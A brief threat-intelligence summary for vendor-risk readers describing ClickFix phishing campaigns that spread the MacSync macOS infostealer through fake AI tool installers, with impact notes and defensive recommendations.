ClickFix Campaigns Deploy MacSync macOS Infostealer via Fake AI Tool Installers
What Happened — Three distinct ClickFix phishing campaigns were uncovered delivering the macOS information‑stealer MacSync. The attackers masquerade the payload as “AI‑powered” utilities, tricking victims into copying and executing malicious shell commands. MacSync then harvests credentials, browser data, and system information.
Why It Matters for TPRM —
- macOS endpoints are increasingly used by third‑party vendors and remote workforces; a successful infection can expose sensitive corporate data.
- Credential theft enables lateral movement into partner networks, amplifying supply‑chain risk.
- The social‑engineering‑only delivery bypasses traditional exploit‑based defenses, requiring updated user‑awareness controls.
Who Is Affected — Enterprises across all sectors that allow macOS devices (e.g., TECH_SAAS, FIN_SERV, PROF_SERV) and managed service providers (MSPs) supporting macOS workstations.
Recommended Actions —
- Conduct immediate user‑awareness training on fake installer scams and command‑line phishing.
- Enforce application‑whitelisting or notarization policies on macOS endpoints.
- Block known ClickFix domains/IPs and monitor DNS queries for related indicators.
- Deploy endpoint detection that can flag MacSync binaries and its typical file‑paths.
Technical Notes — Attack vector: phishing/social engineering (fake AI tool installers) with no exploit chain. The malware exfiltrates credentials, browser histories, and system metadata. Source: The Hacker News